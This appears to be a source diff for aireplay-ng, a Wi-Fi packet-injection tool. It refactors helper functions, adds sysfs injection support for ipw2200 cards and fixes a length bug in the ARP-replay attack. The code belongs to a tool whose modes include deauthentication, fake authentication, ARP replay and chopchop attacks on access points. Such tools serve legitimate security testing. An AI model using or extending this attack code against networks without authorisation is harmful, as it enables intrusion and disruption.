@@ -34,6 +34,7 @@
 #include <linux/wireless.h>
 #include <arpa/inet.h>
 #include <unistd.h>
+#include <dirent.h>
 #include <signal.h>
 #include <string.h>
 #include <stdlib.h>
@@ -49,7 +50,6 @@
 
 #include "version.h"
 #include "pcap.h"
-#include "crctable.h"
 
 #define NULL_MAC        "\x00\x00\x00\x00\x00\x00"
 #define BROADCAST       "\xFF\xFF\xFF\xFF\xFF\xFF"
@@ -82,8 +82,15 @@
     "\x01\x04\x02\x04\x0B\x16\x32\x08\x0C\x12\x18\x24\x30\x48\x60\x6C"
 
 extern char * getVersion(char * progname, int maj, int min, int submin, int betavers);
-extern int is_ndiswrapper(const char * iface);
-extern int iwpriv_exist(void);
+extern int is_ndiswrapper(const char * iface, const char * path);
+extern char * searchInside(const char * dir, const char * filename);
+extern char * wiToolsPath(const char * tool);
+extern unsigned char * getmac(char * macAddress, int strict, unsigned char * mac);
+extern int check_crc_buf( unsigned char *buf, int len );
+
+extern const unsigned long int crc_tbl[256];
+extern const unsigned char crc_chop_tbl[256][4];
+
 
 char usage[] =
 
@@ -165,7 +172,7 @@ struct options
     int a_mode;
     int a_count;
     int a_delay;
-    
+
     int ringbuffer;
     int ghost;
 }
@@ -181,6 +188,7 @@ struct devices
     int is_hostap;
     int is_madwifi;
     int is_madwifing;
+    int is_bcm43xx;
 
     FILE *f_cap_in;
 
@@ -202,6 +210,9 @@ char strbuf[512];
 
 int ctrl_c, alarmed;
 
+char * iwpriv;
+
+
 void sighandler( int signum )
 {
     if( signum == SIGINT )
@@ -211,23 +222,6 @@ void sighandler( int signum )
         alarmed++;
 }
 
-/* CRC checksum verification routine */
-
-int check_crc_buf( unsigned char *buf, int len )
-{
-    unsigned long crc = 0xFFFFFFFF;
-    
-    for( ; len > 0; len--, buf++ )
-        crc = crc_tbl[(crc ^ *buf) & 0xFF] ^ ( crc >> 8 );
-
-    crc = ~crc;
-
-    return( ( ( crc       ) & 0xFF ) == buf[0] &&
-            ( ( crc >>  8 ) & 0xFF ) == buf[1] &&
-            ( ( crc >> 16 ) & 0xFF ) == buf[2] &&
-            ( ( crc >> 24 ) & 0xFF ) == buf[3] );
-}
-
 /* wlanng-aware frame sending routing */
 
 int send_packet( void *buf, size_t count )
@@ -347,6 +341,7 @@ int read_packet( void *buf, size_t count )
     return( caplen );
 }
 
+
 int filter_packet( unsigned char *h80211, int caplen )
 {
     int z, mi_b, mi_s, mi_d;
@@ -407,6 +402,7 @@ int filter_packet( unsigned char *h80211, int caplen )
     return( 0 );
 }
 
+
 #define PCT { struct tm *lt; time_t tc = time( NULL ); \
               lt = localtime( &tc ); printf( "%02d:%02d:%02d  ", \
               lt->tm_hour, lt->tm_min, lt->tm_sec ); }
@@ -1384,7 +1380,7 @@ int do_attack_arp_resend( void )
             if( nb_arp > 0 )
             {
                 if( send_packet( arp[arp_off1].buf,
-                                 arp[arp_off2].len ) < 0 )
+                                 arp[arp_off1].len ) < 0 )
                     return( 1 );
 
                 if( ++arp_off1 >= nb_arp )
@@ -1536,7 +1532,7 @@ add_arp:
             nb_arp_tot++;
 
 			/* Ring buffer size: by default: 8 ) */
-	
+
             if( nb_arp >= opt.ringbuffer && opt.ringbuffer > 0)
             {
                 /* no more room, overwrite oldest entry */
@@ -1547,12 +1543,12 @@ add_arp:
                 if( ++arp_off2 >= nb_arp )
                     arp_off2 = 0;
             } else {
-            
+
                 if( ( arp[nb_arp].buf = malloc( 128 ) ) == NULL ) {
                     perror( "malloc failed" );
                     return( 1 );
                 }
-   
+
                 memcpy( arp[nb_arp].buf, h80211, caplen );
                 arp[nb_arp].len = caplen;
                 nb_arp++;
@@ -1962,7 +1958,7 @@ int do_attack_chopchop( void )
             if( ! ( h80211[5] & 1 ) )
             {
             	if( data_end < 41 ) goto header_rec;
-            	
+
                 printf( "\n\nFailure: the access point does not properly "
                         "discard frames with an\ninvalid ICV - try running "
                         "aireplay-ng in authenticated mode (-h) instead.\n\n" );
@@ -2000,7 +1996,7 @@ int do_attack_chopchop( void )
             if( ! ( h80211[5] & 1 ) )
             {
             	if( data_end < 41 ) goto header_rec;
-            	
+
                 printf( "\n\nFailure: the access point does not properly "
                         "discard frames with an\ninvalid ICV - try running "
                         "aireplay-ng in non-authenticated mode instead.\n\n" );
@@ -2162,12 +2158,30 @@ int do_attack_chopchop( void )
 
     printf( "\nCompleted in %lds (%0.2f bytes/s)\n\n",
             time( NULL ) - tt,
-            (float) ( pkh.caplen - 6 - z ) / 
+            (float) ( pkh.caplen - 6 - z ) /
             (float) ( time( NULL ) - tt  ) );
 
     return( 0 );
 }
 
+
+int sysfs_inject=0;
+int opensysfs( char *iface, int fd) {
+    int fd2;
+    char buf[256];
+
+    snprintf(buf, 256, "/sys/class/net/%s/device/inject", iface);
+    fd2 = open(buf, O_WRONLY);
+    if (fd2 == -1)
+        return -1;
+
+    dup2(fd2, fd);
+    close(fd2);
+
+    sysfs_inject=1;
+    return 0;
+}
+
 /* interface initialization routine */
 
 int openraw( char *iface, int fd, int *arptype )
@@ -2217,6 +2231,10 @@ int openraw( char *iface, int fd, int *arptype )
         ifr.ifr_hwaddr.sa_family != ARPHRD_IEEE80211_PRISM &&
         ifr.ifr_hwaddr.sa_family != ARPHRD_IEEE80211_FULL )
     {
+		/* try sysfs instead (ipw2200) */
+		if (opensysfs(iface, fd) == 0)
+            return 0;
+
         if( ifr.ifr_hwaddr.sa_family == 1 )
             fprintf( stderr, "\nARP linktype is set to 1 (Ethernet) " );
         else
@@ -2226,7 +2244,8 @@ int openraw( char *iface, int fd, int *arptype )
         fprintf( stderr, "- expected ARPHRD_IEEE80211\nor ARPHRD_IEEE8021"
                          "1_PRISM instead.  Make sure RFMON is enabled:\n"
                          "run 'ifconfig %s up; iwconfig %s mode Monitor "
-                         "channel <#>'\n\n", iface, iface );
+                         "channel <#>'\nSysfs injection support was not "
+                         "found either.\n\n", iface, iface );
         return( 1 );
     }
 
@@ -2248,39 +2267,15 @@ int openraw( char *iface, int fd, int *arptype )
     return( 0 );
 }
 
-/* MAC address parsing routine */
-
-int getmac( char *s, unsigned char *mac )
-{
-    int i = 0, n;
-
-    while( sscanf( s, "%x", &n ) == 1 )
-    {
-        if( n < 0 || n > 255 )
-            return( 1 );
-
-        mac[i] = n;
-
-        if( ++i == 6 ) break;
-
-        if( ! ( s = strchr( s, ':' ) ) )
-            break;
-
-        s++;
-    }
-
-    return( i != 6 );
-}
-
 char athXraw[] = "athXraw";
 
 int main( int argc, char *argv[] )
 {
     int n;
-
     /* check the arguments */
 
     memset( &opt, 0, sizeof( opt ) );
+    memset( &dev, 0, sizeof( dev ) );
 
     opt.f_type    = -1; opt.f_subtype   = -1;
     opt.f_minlen  = -1; opt.f_maxlen    = -1;
@@ -2293,7 +2288,7 @@ int main( int argc, char *argv[] )
     while( 1 )
     {
         int option_index = 0;
-        
+
         static struct option long_options[] = {
             {"deauth",      1, 0, '0'},
             {"fakeauth",    1, 0, '1'},
@@ -2312,12 +2307,12 @@ int main( int argc, char *argv[] )
         switch( option )
         {
         	case 0 :
-        		
+
         		break;
-        		
+
             case 'b' :
 
-                if( getmac( optarg, opt.f_bssid ) != 0 )
+				if( getmac( optarg, 1 ,opt.f_bssid ) != 0 )
                 {
                     printf( "Invalid BSSID (AP MAC address).\n" );
                     return( 1 );
@@ -2326,7 +2321,7 @@ int main( int argc, char *argv[] )
 
             case 'd' :
 
-                if( getmac( optarg, opt.f_dmac ) != 0 )
+                if( getmac( optarg, 1, opt.f_dmac ) != 0 )
                 {
                     printf( "Invalid destination MAC address.\n" );
                     return( 1 );
@@ -2335,7 +2330,7 @@ int main( int argc, char *argv[] )
 
             case 's' :
 
-                if( getmac( optarg, opt.f_smac ) != 0 )
+                if( getmac( optarg, 1, opt.f_smac ) != 0 )
                 {
                     printf( "Invalid source MAC address.\n" );
                     return( 1 );
@@ -2434,7 +2429,7 @@ int main( int argc, char *argv[] )
 
             case 'a' :
 
-                if( getmac( optarg, opt.r_bssid ) != 0 )
+                if( getmac( optarg, 1, opt.r_bssid ) != 0 )
                 {
                     printf( "Invalid AP MAC address.\n" );
                     return( 1 );
@@ -2443,7 +2438,7 @@ int main( int argc, char *argv[] )
 
             case 'c' :
 
-                if( getmac( optarg, opt.r_dmac ) != 0 )
+                if( getmac( optarg, 1, opt.r_dmac ) != 0 )
                 {
                     printf( "Invalid destination MAC address.\n" );
                     return( 1 );
@@ -2462,7 +2457,7 @@ int main( int argc, char *argv[] )
 
             case 'h' :
 
-                if( getmac( optarg, opt.r_smac ) != 0 )
+                if( getmac( optarg, 1, opt.r_smac ) != 0 )
                 {
                     printf( "Invalid source MAC address.\n" );
                     return( 1 );
@@ -2501,9 +2496,9 @@ int main( int argc, char *argv[] )
                 break;
 
 			case 'z' :
-			
+
 				opt.ghost = 1;
-			
+
 				break;
 
             case '0' :
@@ -2600,8 +2595,6 @@ int main( int argc, char *argv[] )
         return( 1 );
     }
 
-    memset( &dev, 0, sizeof( dev ) );
-
     dev.fd_rtc = -1;
 
     /* open the RTC device if necessary */
@@ -2649,18 +2642,20 @@ int main( int argc, char *argv[] )
     }
 
 	/* Check iwpriv existence */
-	
-    if (! iwpriv_exist() )
+
+	iwpriv = wiToolsPath("iwpriv");
+
+    if (! iwpriv )
 	{
-		printf("Can't find wireless tools, exiting.\n");
+		fprintf(stderr, "Can't find wireless tools, exiting.\n");
 		return (1);
 	}
-    
+
 	/* Exit if ndiswrapper : check iwpriv ndis_reset */
-	
-	if ( is_ndiswrapper(argv[optind]) )
+
+	if ( is_ndiswrapper(argv[optind], iwpriv ) )
 	{
-		printf("Ndiswrapper doesn't support monitor mode.\n");
+		fprintf(stderr, "Ndiswrapper doesn't support monitor mode.\n");
 		return (1);
 	}
 
@@ -2722,7 +2717,7 @@ int main( int argc, char *argv[] )
 
         if( system( strbuf ) == 0 )
         {
-        	
+
             athXraw[3] = argv[optind][3];
 
             memset( strbuf, 0, sizeof( strbuf ) );
@@ -2744,7 +2739,7 @@ int main( int argc, char *argv[] )
         	dev.is_madwifing=1;
         }
     }
-	
+
     /* drop privileges */
 
     setuid( getuid() );
@@ -2779,6 +2774,13 @@ int main( int argc, char *argv[] )
         dev.arptype_in = dev.arptype_out;
     }
 
+	if( sysfs_inject && (opt.a_mode==0 || opt.a_mode==1) )
+    {
+           printf( "IPW2200-sysfs does not support non-data injection, so attack %d is not supported\n",
+           			opt.a_mode);
+           return( 1 );
+    }
+
     if( opt.s_file != NULL )
     {
         if( ! ( dev.f_cap_in = fopen( opt.s_file, "rb" ) ) )
